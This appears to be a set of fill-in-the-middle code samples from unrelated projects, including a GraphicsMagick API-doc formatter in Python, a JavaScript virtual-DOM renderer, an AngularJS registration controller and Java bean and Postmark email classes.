"""Enable the '[] =' notation for Tracks.
Throw an UnexpectedObjectError if the value being set is not a
mingus.containers.Bar object.
"""
if not hasattr(value, 'bar'):
raise UnexpectedObjectError("Unexpected object '%s', "
"expecting a mingus.containers.Barobject" % value)
self.bars[index] = value
def __repr__(self):
"""Return a string representing the class."""
return str([self.instrument, self.bars])
def __len__(self):
"""Enable the len() function for Tracks."""
return len(self.bars)<|fim▁end|> | track."""
for bar in self.bars: |
<|file_name|>_config.js<|end_file_name|><|fim▁begin|>export default {
html: `
<p>42</p>
<p>42</p>
`,
async test({ assert, component, target }) {
await component.updateStore(undefined);
assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>42</p>');
await component.updateStore(33);
assert.htmlEqual(target.innerHTML, '<p>33</p><p>42</p>');
await component.updateStore(undefined);
assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>42</p>');
await component.updateVar(undefined);
assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>undefined</p>');
await component.updateVar(33);
assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>33</p>');
await component.updateVar(undefined);<|fim▁hole|><|fim▁end|> | assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>undefined</p>');
}
}; |
<|file_name|>register-form.controller.js<|end_file_name|><|fim▁begin|>(function() {
'use strict';
angular.module('cd.app.registerForm')
.controller('RegisterFormController', RegisterFormController);
/* @ngInject */
function RegisterFormController ($location, StepsService) {<|fim▁hole|> var $ctrl = this;
$ctrl.selectedPlatform = JSON.parse(localStorage.getItem('selectedPlatform'));
$ctrl.selectedPackage = JSON.parse(localStorage.getItem('selectedPackage'));
if (StepsService.currentStep < StepsService.REGISTER) {
$location.path('/package');
} else {
_init();
}
function _init () {
$ctrl.registerForm = {
nome: '',
email: '',
nascimento: '',
cpf: '',
telefone: ''
};
$ctrl.submit = submit;
function submit () {
console.groupCollapsed('Formulário Enviado');
console.log('Formulário de registro', $ctrl.registerForm);
console.log('Plano Selecionado', $ctrl.selectedPackage);
console.log('Plataforma Selecionada', $ctrl.selectedPlatform);
console.groupEnd();
};
};
};
})();<|fim▁end|> | |
<|file_name|>format_c_api_doc.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ts=4:sw=4:expandtab:
# Copyright 2008 Mark Mitchell
# License: see __license__ below.
__doc__ = """
Reads a GraphicsMagick source file and parses the specially formatted
comment blocks which precede each function and writes the information
obtained from the comment block into a reStructuredText file.
Usage:
format_c_api_docs.py [options] SRCFILE OUTFILE
SRCFILE is the path to a Graphicsmagick API .c file.
For example: ./magick/animate.c
OUTFILE is the path where the reStructuredText file is written.
Options:
-h --help -- Print this help message
-w --whatis-file -- The path to a file containing "whatis" information for
the source files. The format of this file is:
* one line per source file
* source filename (without directory paths) and whatis text
are separated by whitespace
* blank lines are ignored
* lines starting with '#' are ignored
-i --include-rst -- Comma-separated list of file paths to be objects of reST
..include:: directives inserted in OUTFILE.
The default is the single file 'api_hyperlinks.rst'
Example of whatis file format:
animate.c Interactively animate an image sequence
annotate.c Annotate an image with text
"""
__copyright__ = "2008, Mark Mitchell"
__license__ = """
Copyright 2008, Mark Mitchell
Permission is hereby granted, free of charge, to any person obtaining
a copy of this Software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
The Software is provided "as is", without warranty of any kind,
express or implied, including but not limited to the warranties of
merchantability, fitness for a particular purpose and noninfringement.
In no event shall the authors or copyright holders be liable for any
claim, damages or other liability, whether in an action of contract,
tort or otherwise, arising from, out of or in connection with Software
or the use or other dealings in the Software.
"""
import sys
import getopt
import os, os.path
import re
import textwrap
# Key words to replace with HTML links
keywords = {
'AffineMatrix' : '`AffineMatrix`_',
'BlobInfo' : '`BlobInfo`_',
'Cache' : '`Cache`_',
'ChannelType' : '`ChannelType`_',
'ChromaticityInfo' : '`ChromaticityInfo`_',
'ClassType' : '`ClassType`_',
'ClipPathUnits' : '`ClipPathUnits`_',
'ColorPacket' : '`ColorPacket`_',
'ColorspaceType' : '`ColorspaceType`_',
'ComplianceType' : '`ComplianceType`_',
'CompositeOperator' : '`CompositeOperator`_',
'CompressionType' : '`CompressionType`_',
'DecorationType' : '`DecorationType`_',
'DrawContext' : '`DrawContext`_',
'DrawInfo' : '`DrawInfo`_',
'ErrorHandler' : '`ErrorHandler`_',
'ExceptionInfo' : '`ExceptionInfo`_',
'ExceptionType' : '`ExceptionType`_',
'FillRule' : '`FillRule`_',
'FilterTypes' : '`FilterTypes`_',
'FrameInfo' : '`FrameInfo`_',
'GravityType' : '`GravityType`_',
'Image' : '`Image`_',
'ImageInfo' : '`ImageInfo`_',
'ImageType' : '`ImageType`_',
'InterlaceType' : '`InterlaceType`_',
'LayerType' : '`LayerType`_',
'MagickInfo' : '`MagickInfo`_',
'MonitorHandler' : '`MonitorHandler`_',
'MontageInfo' : '`MontageInfo`_',
'NoiseType' : '`NoiseType`_',
'PaintMethod' : '`PaintMethod`_',
'PixelPacket' : '`PixelPacket`_',
'PointInfo' : '`PointInfo`_',
'ProfileInfo' : '`ProfileInfo`_',
'QuantizeInfo' : '`QuantizeInfo`_',
'Quantum' : '`Quantum`_',
'QuantumType' : '`QuantumType`_',
'RectangleInfo' : '`RectangleInfo`_',
'RegistryType' : '`RegistryType`_',
'RenderingIntent' : '`RenderingIntent`_',
'ResolutionType' : '`ResolutionType`_',
'ResourceType' : '`ResourceType`_',
'SegmentInfo' : '`SegmentInfo`_',
'SignatureInfo' : '`SignatureInfo`_',
'StorageType' : '`StorageType`_',
'StreamHandler' : '`StreamHandler`_',
'StretchType' : '`StretchType`_',
'StyleType' : '`StyleType`_',
'TypeMetric' : '`TypeMetric`_',
'ViewInfo' : '`ViewInfo`_',
'VirtualPixelMethod' : '`VirtualPixelMethod`_',
'MagickXResourceInfo' : '`MagickXResourceInfo`_',
}
state_init = 0
state_found_fcncomment = 1
state_found_fcntitle = 2
state_found_fcndoc = 3
state_more_prototype = 4
state_found_prototype = 5
state_found_private = 6
state_parmdescr = 7
def warn(msg):
print >> sys.stderr, msg
def debugtrace(msg):
print >> sys.stdout, msg
def nodebugtrace(msg):
pass
dtrace = nodebugtrace
#dtrace = debugtrace
# extract and save function title. example:
# + X M a g i c k C o m m a n d %
# % X A n i m a t e B a c k g r o u n d I m a g e %
# Lines starting with '+' are private APIs which should not appear in
# in the output.
re_func_title = re.compile(r'^[+|%]\s+((\w )+)\s*%')
def proto_pretty(line):
"""fixes up inconsistent spaces in C function prototypes"""
line = re.sub(r',', ' , ', line)
line = re.sub(r'\(', ' ( ', line)
line = re.sub(r'\)', ' ) ', line)
line = re.sub(r'\*', ' * ', line)
line = re.sub(r'\s+', ' ', line)
line = re.sub(r'\(\s+\*', '(*', line)
line = re.sub(r' ,', ',', line)
line = re.sub(r' \(', '(', line)
line = re.sub(r'\) ', ')', line)
line = re.sub(r' \* ', ' *', line)
line = re.sub('^\s*', '', line)
return line
class Paragraph:
"Paragraphs consist of one or more lines of text."
def __init__(self):
self.lines = []
def __str__(self):
#return '\n'.join(self.lines)
return '\n'.join([line.strip() for line in self.lines])
class Prototype:
def __init__(self):
self.lines = []
def __str__(self):
proto = ' '.join(self.lines)
proto = proto_pretty(proto)
# escape all the '*' chars
proto = re.sub(r'\*', '\\*', proto)
# escape all the '_' chars
proto = re.sub(r'_', '\\_', proto)
# now replace keywords with hyperlinks
for k,v in keywords.iteritems():
proto = re.sub(r'^%s ' % k, '%s ' % v, proto)
proto = re.sub(r' %s ' % k, ' %s ' % v, proto)
# make some attempt to wrap the text nicely
openparen_index = proto.find('(')
if openparen_index > 0:
fcn = proto[:openparen_index+1]
indent_len = len(fcn) + 3
toomuch = (2 * fcn.count('\\')) + (3 * fcn.count('`_'))
if toomuch > 0: # account for the space following the opening paren
toomuch -= 1
indent_len -= toomuch
params = proto[openparen_index+1:].split(',')
params = [p.strip() for p in params]
max_param_len = 0
for x in params:
if len(x) > max_param_len:
max_param_len = len(x)
wrap_width = max(96, max_param_len + indent_len)
proto_lines = []
line = fcn + ' '
while params:
x = params.pop(0)
if len(line) + len(x) > wrap_width:
proto_lines.append(line)
line = ' ' * indent_len
line += x
if params:
line += ', '
proto_lines.append(line)
proto = '\n '.join(proto_lines)
return ".. parsed-literal::\n\n %s" % proto
class ListItem:
"""List items are used for parameter descriptions, and consist of the
parameter name and one or more lines of description text."""
def __init__(self, name):
self.name = name
self.lines = []
def __str__(self):
s = []
s.append('%s:' % self.name)
for line in self.lines:
s.append(' %s' % line.strip())
return '\n'.join(s)
class Function:
def __init__(self, name):
self.name = name
self.prototype = None
# Description is a list, the items of which are either Paragraph or
# ListItem or Prototype instances.
self.description = []
def __str__(self):
lines = []
lines.append('')
lines.append('')
lines.append(self.name)
lines.append('=' * len(self.name))
lines.append('')
lines.append('Synopsis')
lines.append('--------')
lines.append(str(self.prototype))
lines.append('')
lines.append('Description')
lines.append('-----------')
for item in self.description:
lines.append(str(item))
lines.append('')
return '\n'.join(lines)
def parse(srcfilepath):
list_item = None
proto = None
para = None
func = None
functions = []
state = state_init
linecnt = 0
ftitle = None
f = file(srcfilepath, 'r')
for line in f:
linecnt += 1
if not (line.startswith('%') or line.startswith('+') or re.search(r'\*/', line)):
continue
line = line.strip()
if state == state_init:
# Find first line of function title/comment block
if line.startswith('%%%%%%%%'):
dtrace('Line %d: start of function comment block ############' % linecnt)
state = state_found_fcncomment
continue
elif state == state_found_fcncomment:
# Search for the function name, with spaces between each letter
if line.startswith('%%%%%%%%'):
warn('Line %d: WARNING: no function name found, found start of function comment block instead.' % linecnt)
state = state_init
continue
m = re_func_title.search(line)
if m:
if line.startswith('+'):
dtrace('Line %d: private API' % linecnt)
# private API, skip it
state = state_found_private
else:
# public API, process it
ftitle = re.sub(' ', '', m.group(1))
dtrace('Line %d: public API %s' % (linecnt, ftitle))
func = Function(ftitle)
functions.append(func)
state = state_found_fcntitle
continue
elif state == state_found_private:
# skip to end of function title block
if line.startswith('%%%%%%%%'):
dtrace('Line %d: end of private function comment block' % linecnt)
state = state_init
continue
elif state == state_found_fcntitle:
# skip to first line following end of function title block.
# lines of the function title block start with and end with '%'.
if not re.match(r'%.+%', line):
dtrace('Line %d: end of public function comment block %s' % (linecnt, ftitle))
state = state_found_fcndoc
# fall through
elif state == state_found_fcndoc:
# extract function prototype
if line.startswith('% '):
line = re.sub(r'^%\s{0,2}', '', line, 1)
# if empty args (), it's not the prototype, but the one-line summary
if re.search(r'%s\(\)' % ftitle, line):
if para is None:
dtrace('Line %d: found_fcndoc start paragraph ()' % linecnt)
para = Paragraph()
func.description.append(para)
para.lines.append(line)
# is this only line of prototype?
elif re.search(r'%s\([^)]+\)$' % ftitle, line):
if para:
dtrace('Line %d: found_fcndoc end paragraph by proto ()' % linecnt)
para = None
dtrace('Line %d: one-line prototype' % linecnt)
proto = Prototype()
proto.lines.append(line)
func.description.append(proto)
func.prototype = proto
proto = None
state = state_found_prototype
# is this first line of multiline prototype?
elif re.search(r'%s\([^)]*$' % ftitle, line):
if para:
dtrace('Line %d: found_fcndoc end paragraph by proto (' % linecnt)
para = None
dtrace('Line %d: first line of multi-line prototype' % linecnt)
proto = Prototype()
proto.lines.append(line)
func.description.append(proto)
func.prototype = proto
state = state_more_prototype
else:
if para is None:
dtrace('Line %d: found_fcndoc start paragraph' % linecnt)
para = Paragraph()
func.description.append(para)
para.lines.append(line)
else:
if line.startswith('%%%%%%%%'):
warn('Line %d: WARNING: no prototype found for %s, found start of function comment block instead.' % (linecnt, ftitle))
state = state_found_fcncomment
continue
if line.strip() == '%':
# empty line terminates paragraph
if para:
dtrace('Line %d: found_fcndoc end paragraph by blank line' % linecnt)
para = None
if proto:
dtrace('Line %d: found_fcndoc end proto by blank line' % linecnt)
proto = None
continue
elif state == state_more_prototype:
if re.match(r'%.+%', line):
# really this should raise a warning of "incomplete prototype"
continue
line = re.sub(r'^%\s{0,2}', '', line, 1)
if re.search(r'^\s*$', line):
dtrace('Line %d: end of more prototype' % linecnt)
state = state_found_prototype
else:
func.prototype.lines.append(line)
continue
elif state == state_found_prototype:
dtrace('Line %d: found prototype of function %s' % (linecnt, ftitle))
func.prototype.lines.append(';')
#print 'Function %s' % func.name
#print 'Synopsis'
#print ' '.join(func.prototype)
#print
# Process parm description.
# Description consists of two kinds of texts: paragraphs, and lists.
# Lists consist of list items. List items are one or more lines.
# List items are separated by blank lines. The first line of a list
# item starts with 'o '.
# Paragraphs consist of one or more lines which don't start with 'o '.
# Paragraphs are separated from each other and from adjacent list items
# by blank lines.
# In theory, a line which starts with 'o ' which is not preceded by a
# blank line is illegal syntax.
para = None
state = state_parmdescr
# fall through
elif state == state_parmdescr:
if line.endswith('*/'):
# end of function comment block
dtrace('Line %d: end of parmdescr ************' % linecnt)
if list_item:
func.description.append(list_item)
list_item = None
if para:
func.description.append(para)
dtrace('Line %d: parmdescr end paragraph ()' % linecnt)
para = None
func = None
state = state_init
continue
line = re.sub(r'^%\s{0,2}', '', line, 1)
if line:
# look for list item, which starts with 'o'
m = re.search(r'^\s+o\s+([^:]+:|o|[0-9]\.)\s(.*)', line)
if m:
# first line of list item
if list_item: # if blank lines separate list items, this should never evaluate true
dtrace('Line %d: surprising end of list item' % linecnt)
func.description.append(list_item)
list_item = None
dtrace('Line %d: start list item' % linecnt)
list_item = ListItem(m.group(1).strip().rstrip(':'))
list_item.lines.append(m.group(2))
else:
# either a line of paragraph or subsequent line of list item
if list_item:
# subsequent line of list item
list_item.lines.append(line)
else:
# line of paragraph
if list_item: # if blank lines after list items, this should never evaluate true
dtrace('Line %d: end of list item, end of list' % linecnt)
func.description.append(list_item)
list_item = None
if para is None:
dtrace('Line %d: parmdescr start paragraph' % linecnt)
para = Paragraph()
para.lines.append(line)
else:
# empty line, two cases:
# 1. terminate multi-line list item
# 2. terminate multi-line paragraph
if list_item:
dtrace('Line %d: parmdescr end of list item by blank line' % linecnt)
func.description.append(list_item)
list_item = None
elif para:
# terminate any paragraph
dtrace('Line %d: parmdescr end of paragraph by blank line' % linecnt)
func.description.append(para)
para = None
continue
f.close()
return functions
def process_srcfile(srcfilepath, basename, whatis, outfile, include_rst):
"""outfile is a file object open for writing"""
functions = parse(srcfilepath)
print >> outfile, "=" * len(basename)
print >> outfile, basename
print >> outfile, "=" * len(basename)
if whatis:
print >> outfile, "-" * len(whatis)
print >> outfile, whatis
print >> outfile, "-" * len(whatis)
print >> outfile
print >> outfile, '.. contents:: :depth: 1'
print >> outfile
for x in include_rst:<|fim▁hole|> for func in functions:
print >> outfile, func
#para = para.strip() # trim leading and trailing whitespace
#para = re.sub(r'\s+', ' ', para) # canonicalize inner whitespace
#para = re.sub(r"""([a-zA-Z0-9][.!?][)'"]*) """, '\1 ', para) # Fix sentence ends
def find_val(key, keyval_file):
val = None
f = file(keyval_file, 'r')
cnt = 0
for line in f:
cnt += 1
if not line.strip():
continue
if line.startswith('#'):
continue
try:
k, v = line.split(None, 1)
except ValueError:
print >> sys.stderr, "Line %u of %s: improper format" % (cnt, keyval_file)
return None
if k == key:
val = v
break
f.close()
return val.strip()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
# parse command line options
try:
opts, posn_args = getopt.getopt(argv, 'hw:i:',
['help',
'whatis-file=',
'include-rst=',
])
except getopt.GetoptError, msg:
print msg
print __doc__
return 1
# process options
whatis_file = None
include_rst = ['api_hyperlinks.rst']
for opt, val in opts:
if opt in ("-h", "--help"):
print __doc__
return 0
if opt in ("-w", "--whatis-file"):
whatis_file = val
if opt in ("-i", "--include-rst"):
include_rst = [x for x in val.split(',') if x]
if len(posn_args) != 2:
print >> sys.stderr, 'Missing arguments'
print >> sys.stderr, __doc__
return 1
srcfile_path = posn_args[0]
outfile_path = posn_args[1]
srcfile = os.path.basename(srcfile_path)
base, ext = os.path.splitext(srcfile)
if whatis_file:
whatis = find_val(srcfile, whatis_file)
else:
whatis = None
fout = file(outfile_path, 'w')
process_srcfile(srcfile_path, base, whatis, fout, include_rst)
fout.close()
return 0
if __name__ == '__main__':
sys.exit(main())<|fim▁end|> | print >> outfile, '.. include:: %s' % x
print >> outfile
# print all functions found in this source file |
<|file_name|>vdom-my.js<|end_file_name|><|fim▁begin|>export function Fragment(props, ...children) {
return collect(children);
}
const ATTR_PROPS = '_props';
function collect(children) {
const ch = [];
const push = (c) => {
if (c !== null && c !== undefined && c !== '' && c !== false) {
ch.push((typeof c === 'function' || typeof c === 'object') ? c : `${c}`);
}
};
children && children.forEach(c => {
if (Array.isArray(c)) {
c.forEach(i => push(i));
}
else {
push(c);
}
});
return ch;
}
export function createElement(tag, props, ...children) {
const ch = collect(children);
if (typeof tag === 'string')
return { tag, props, children: ch };
else if (Array.isArray(tag))
return tag; // JSX fragments - babel
else if (tag === undefined && children)
return ch; // JSX fragments - typescript
else if (Object.getPrototypeOf(tag).__isAppRunComponent)
return { tag, props, children: ch }; // createComponent(tag, { ...props, children });
else if (typeof tag === 'function')
return tag(props, ch);
else
throw new Error(`Unknown tag in vdom ${tag}`);
}
;
const keyCache = new WeakMap();
export const updateElement = render;
export function render(element, nodes, parent = {}) {
// console.log('render', element, node);
// tslint:disable-next-line
if (nodes == null || nodes === false)
return;
nodes = createComponent(nodes, parent);
const isSvg = (element === null || element === void 0 ? void 0 : element.nodeName) === "SVG";
if (!element)
return;
if (Array.isArray(nodes)) {
updateChildren(element, nodes, isSvg);
}
else {
updateChildren(element, [nodes], isSvg);
}
}
function same(el, node) {
// if (!el || !node) return false;
const key1 = el.nodeName;
const key2 = `${node.tag || ''}`;
return key1.toUpperCase() === key2.toUpperCase();
}
function update(element, node, isSvg) {
if (node['_op'] === 3)
return;
// console.assert(!!element);
isSvg = isSvg || node.tag === "svg";
if (!same(element, node)) {
element.parentNode.replaceChild(create(node, isSvg), element);
return;
}
!(node['_op'] & 2) && updateChildren(element, node.children, isSvg);
!(node['_op'] & 1) && updateProps(element, node.props, isSvg);
}
function updateChildren(element, children, isSvg) {
var _a;
const old_len = ((_a = element.childNodes) === null || _a === void 0 ? void 0 : _a.length) || 0;
const new_len = (children === null || children === void 0 ? void 0 : children.length) || 0;
const len = Math.min(old_len, new_len);
for (let i = 0; i < len; i++) {
const child = children[i];
if (child['_op'] === 3)
continue;
const el = element.childNodes[i];
if (typeof child === 'string') {
if (el.textContent !== child) {
if (el.nodeType === 3) {
el.nodeValue = child;
}
else {
element.replaceChild(createText(child), el);
}
}
}
else if (child instanceof HTMLElement || child instanceof SVGElement) {
element.insertBefore(child, el);
}
else {
const key = child.props && child.props['key'];
if (key) {
if (el.key === key) {
update(element.childNodes[i], child, isSvg);
}
else {
// console.log(el.key, key);
const old = keyCache[key];
if (old) {
const temp = old.nextSibling;
element.insertBefore(old, el);
temp ? element.insertBefore(el, temp) : element.appendChild(el);
update(element.childNodes[i], child, isSvg);
}
else {
element.replaceChild(create(child, isSvg), el);
}
}
}
else {
update(element.childNodes[i], child, isSvg);
}
}
}
let n = element.childNodes.length;
while (n > len) {
element.removeChild(element.lastChild);
n--;
}
if (new_len > len) {
const d = document.createDocumentFragment();
for (let i = len; i < children.length; i++) {
d.appendChild(create(children[i], isSvg));
}
element.appendChild(d);
}
}
function createText(node) {
if ((node === null || node === void 0 ? void 0 : node.indexOf('_html:')) === 0) { // ?
const div = document.createElement('div');
div.insertAdjacentHTML('afterbegin', node.substring(6));
return div;
}
else {
return document.createTextNode(node !== null && node !== void 0 ? node : '');
}
}
function create(node, isSvg) {
// console.assert(node !== null && node !== undefined);
if ((node instanceof HTMLElement) || (node instanceof SVGElement))
return node;
if (typeof node === "string")
return createText(node);
if (!node.tag || (typeof node.tag === 'function'))
return createText(JSON.stringify(node));
isSvg = isSvg || node.tag === "svg";
const element = isSvg
? document.createElementNS("http://www.w3.org/2000/svg", node.tag)
: document.createElement(node.tag);
updateProps(element, node.props, isSvg);
if (node.children)
node.children.forEach(child => element.appendChild(create(child, isSvg)));
return element;
}
function mergeProps(oldProps, newProps) {
newProps['class'] = newProps['class'] || newProps['className'];
delete newProps['className'];
const props = {};
if (oldProps)
Object.keys(oldProps).forEach(p => props[p] = null);
if (newProps)
Object.keys(newProps).forEach(p => props[p] = newProps[p]);
return props;
}
export function updateProps(element, props, isSvg) {
// console.assert(!!element);
const cached = element[ATTR_PROPS] || {};
props = mergeProps(cached, props || {});
element[ATTR_PROPS] = props;
for (const name in props) {
const value = props[name];
// if (cached[name] === value) continue;
// console.log('updateProps', name, value);
if (name.startsWith('data-')) {
const dname = name.substring(5);
const cname = dname.replace(/-(\w)/g, (match) => match[1].toUpperCase());
if (element.dataset[cname] !== value) {
if (value || value === "")
element.dataset[cname] = value;
else
delete element.dataset[cname];
}
}
else if (name === 'style') {
if (element.style.cssText)
element.style.cssText = '';
if (typeof value === 'string')
element.style.cssText = value;
else {
for (const s in value) {
if (element.style[s] !== value[s])
element.style[s] = value[s];
}
}
}
else if (name.startsWith('xlink')) {
const xname = name.replace('xlink', '').toLowerCase();
if (value == null || value === false) {
element.removeAttributeNS('http://www.w3.org/1999/xlink', xname);
}
else {
element.setAttributeNS('http://www.w3.org/1999/xlink', xname, value);
}
}
else if (name.startsWith('on')) {
if (!value || typeof value === 'function') {
element[name] = value;
}
else if (typeof value === 'string') {
if (value)
element.setAttribute(name, value);
else
element.removeAttribute(name);
}
}
else if (/^id$|^class$|^list$|^readonly$|^contenteditable$|^role|-/g.test(name) || isSvg) {
if (element.getAttribute(name) !== value) {
if (value)
element.setAttribute(name, value);
else
element.removeAttribute(name);
}
}
else if (element[name] !== value) {
element[name] = value;
}
if (name === 'key' && value)
keyCache[value] = element;
}
if (props && typeof props['ref'] === 'function') {
window.requestAnimationFrame(() => props['ref'](element));
}
}
function render_component(node, parent, idx) {
const { tag, props, children } = node;
let key = `_${idx}`;
let id = props && props['id'];
if (!id)
id = `_${idx}${Date.now()}`;
else
key = id;
let asTag = 'section';
if (props && props['as']) {
asTag = props['as'];
delete props['as'];
}
if (!parent.__componentCache)
parent.__componentCache = {};
let component = parent.__componentCache[key];
if (!component || !(component instanceof tag) || !component.element) {
const element = document.createElement(asTag);
component = parent.__componentCache[key] = new tag(Object.assign(Object.assign({}, props), { children })).start(element);
}
if (component.mounted) {
const new_state = component.mounted(props, children, component.state);
(typeof new_state !== 'undefined') && component.setState(new_state);
}
updateProps(component.element, props, false);
return component.element;
}
function createComponent(node, parent, idx = 0) {
var _a;
if (typeof node === 'string')
return node;
if (Array.isArray(node))
return node.map(child => createComponent(child, parent, idx++));
let vdom = node;
if (node && typeof node.tag === 'function' && Object.getPrototypeOf(node.tag).__isAppRunComponent) {
vdom = render_component(node, parent, idx);
}
if (vdom && Array.isArray(vdom.children)) {
const new_parent = (_a = vdom.props) === null || _a === void 0 ? void 0 : _a._component;
if (new_parent) {
let i = 0;
vdom.children = vdom.children.map(child => createComponent(child, new_parent, i++));
}
else {
vdom.children = vdom.children.map(child => createComponent(child, parent, idx++));
}
}
return vdom;
}<|fim▁hole|><|fim▁end|> | //# sourceMappingURL=vdom-my.js.map |
<|file_name|>MessageBean.java<|end_file_name|><|fim▁begin|>/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package com.cgc.bean;
import java.sql.Timestamp;
/**
*
* @author com02
*/
public class MessageBean {
private int runno;<|fim▁hole|> private String message_id;
private String message_detail;
private String status;
private Timestamp create_date;
private String create_by;
private Timestamp update_date;
private String update_by;
private String delete_flag;
private Timestamp delete_date;
private String delete_by;
private String company_id;
/**
* @return the runno
*/
public int getRunno() {
return runno;
}
/**
* @param runno the runno to set
*/
public void setRunno(int runno) {
this.runno = runno;
}
/**
* @return the message_id
*/
public String getMessage_id() {
return message_id;
}
/**
* @param message_id the message_id to set
*/
public void setMessage_id(String message_id) {
this.message_id = message_id;
}
/**
* @return the message_detail
*/
public String getMessage_detail() {
return message_detail;
}
/**
* @param message_detail the message_detail to set
*/
public void setMessage_detail(String message_detail) {
this.message_detail = message_detail;
}
/**
* @return the status
*/
public String getStatus() {
return status;
}
/**
* @param status the status to set
*/
public void setStatus(String status) {
this.status = status;
}
/**
* @return the create_date
*/
public Timestamp getCreate_date() {
return create_date;
}
/**
* @param create_date the create_date to set
*/
public void setCreate_date(Timestamp create_date) {
this.create_date = create_date;
}
/**
* @return the create_by
*/
public String getCreate_by() {
return create_by;
}
/**
* @param create_by the create_by to set
*/
public void setCreate_by(String create_by) {
this.create_by = create_by;
}
/**
* @return the update_date
*/
public Timestamp getUpdate_date() {
return update_date;
}
/**
* @param update_date the update_date to set
*/
public void setUpdate_date(Timestamp update_date) {
this.update_date = update_date;
}
/**
* @return the update_by
*/
public String getUpdate_by() {
return update_by;
}
/**
* @param update_by the update_by to set
*/
public void setUpdate_by(String update_by) {
this.update_by = update_by;
}
/**
* @return the delete_flag
*/
public String getDelete_flag() {
return delete_flag;
}
/**
* @param delete_flag the delete_flag to set
*/
public void setDelete_flag(String delete_flag) {
this.delete_flag = delete_flag;
}
/**
* @return the delete_date
*/
public Timestamp getDelete_date() {
return delete_date;
}
/**
* @param delete_date the delete_date to set
*/
public void setDelete_date(Timestamp delete_date) {
this.delete_date = delete_date;
}
/**
* @return the delete_by
*/
public String getDelete_by() {
return delete_by;
}
/**
* @param delete_by the delete_by to set
*/
public void setDelete_by(String delete_by) {
this.delete_by = delete_by;
}
/**
* @return the company_id
*/
public String getCompany_id() {
return company_id;
}
/**
* @param company_id the company_id to set
*/
public void setCompany_id(String company_id) {
this.company_id = company_id;
}
}<|fim▁end|> | |
<|file_name|>PostmarkEMail.java<|end_file_name|><|fim▁begin|>package com.diggime.modules.email.model.impl;
import com.diggime.modules.email.model.EMail;
import com.diggime.modules.email.model.MailContact;
import org.json.JSONObject;
import java.time.LocalDateTime;
import java.util.List;
import static org.foilage.utils.checkers.NullChecker.notNull;
public class PostmarkEMail implements EMail {
private final int id;
private final String messageId;
private final LocalDateTime sentDate;
private final MailContact sender;
private final List<MailContact> receivers;
private final List<MailContact> carbonCopies;
private final List<MailContact> blindCarbonCopies;
private final String subject;
private final String tag;
private final String htmlBody;
private final String textBody;
public PostmarkEMail(LocalDateTime sentDate, MailContact sender, List<MailContact> receivers, List<MailContact> carbonCopies, List<MailContact> blindCarbonCopies, String subject, String tag, String htmlBody, String textBody) {
this.id = 0;
this.messageId = "";
this.sentDate = notNull(sentDate);
this.sender = notNull(sender);
this.receivers = notNull(receivers);
this.carbonCopies = notNull(carbonCopies);
this.blindCarbonCopies = notNull(blindCarbonCopies);
this.subject = notNull(subject);
this.tag = notNull(tag);
this.htmlBody = notNull(htmlBody);
this.textBody = notNull(textBody);
}
public PostmarkEMail(String messageId, LocalDateTime sentDate, MailContact sender, List<MailContact> receivers, List<MailContact> carbonCopies, List<MailContact> blindCarbonCopies, String subject, String tag, String htmlBody, String textBody) {
this.id = 0;
this.messageId = notNull(messageId);
this.sentDate = notNull(sentDate);
this.sender = notNull(sender);
this.receivers = notNull(receivers);
this.carbonCopies = notNull(carbonCopies);
this.blindCarbonCopies = notNull(blindCarbonCopies);
this.subject = notNull(subject);
this.tag = notNull(tag);
this.htmlBody = notNull(htmlBody);
this.textBody = notNull(textBody);
}
public PostmarkEMail(EMail mail, String messageId) {
this.id = mail.getId();
this.messageId = notNull(messageId);
this.sentDate = mail.getSentDate();
this.sender = mail.getSender();
this.receivers = mail.getReceivers();
this.carbonCopies = mail.getCarbonCopies();
this.blindCarbonCopies = mail.getBlindCarbonCopies();
this.subject = mail.getSubject();
this.tag = mail.getTag();
this.htmlBody = mail.getHtmlBody();
this.textBody = mail.getTextBody();
}
public PostmarkEMail(int id, String messageId, LocalDateTime sentDate, MailContact sender, List<MailContact> receivers, List<MailContact> carbonCopies, List<MailContact> blindCarbonCopies, String subject, String tag, String htmlBody, String textBody) {
this.id = id;
this.messageId = notNull(messageId);
this.sentDate = notNull(sentDate);
this.sender = notNull(sender);
this.receivers = notNull(receivers);
this.carbonCopies = notNull(carbonCopies);
this.blindCarbonCopies = notNull(blindCarbonCopies);
this.subject = notNull(subject);<|fim▁hole|> this.htmlBody = notNull(htmlBody);
this.textBody = notNull(textBody);
}
@Override
public int getId() {
return id;
}
@Override
public String getMessageId() {
return messageId;
}
@Override
public LocalDateTime getSentDate() {
return sentDate;
}
@Override
public MailContact getSender() {
return sender;
}
@Override
public List<MailContact> getReceivers() {
return receivers;
}
@Override
public List<MailContact> getCarbonCopies() {
return carbonCopies;
}
@Override
public List<MailContact> getBlindCarbonCopies() {
return blindCarbonCopies;
}
@Override
public String getSubject() {
return subject;
}
@Override
public String getTag() {
return tag;
}
@Override
public String getHtmlBody() {
return htmlBody;
}
@Override
public String getTextBody() {
return textBody;
}
@Override
public JSONObject getJSONObject() {
JSONObject obj = new JSONObject();
obj.put("From", sender.getName()+" <"+sender.getAddress()+">");
addReceivers(obj, receivers, "To");
addReceivers(obj, carbonCopies, "Cc");
addReceivers(obj, blindCarbonCopies, "Bcc");
obj.put("Subject", subject);
if(tag.length()>0) {
obj.put("Tag", tag);
}
if(htmlBody.length()>0) {
obj.put("HtmlBody", htmlBody);
} else {
obj.put("HtmlBody", textBody);
}
if(textBody.length()>0) {
obj.put("TextBody", textBody);
}
return obj;
}
private void addReceivers(JSONObject obj, List<MailContact> sendList, String jsonType) {
boolean first = true;
StringBuilder sb = new StringBuilder();
for(MailContact contact: sendList) {
if(first) {
first = false;
} else {
sb.append(", ");
}
sb.append(contact.getName());
sb.append(" <");
sb.append(contact.getAddress());
sb.append(">");
}
if(sendList.size()>0) {
obj.put(jsonType, sb.toString());
}
}
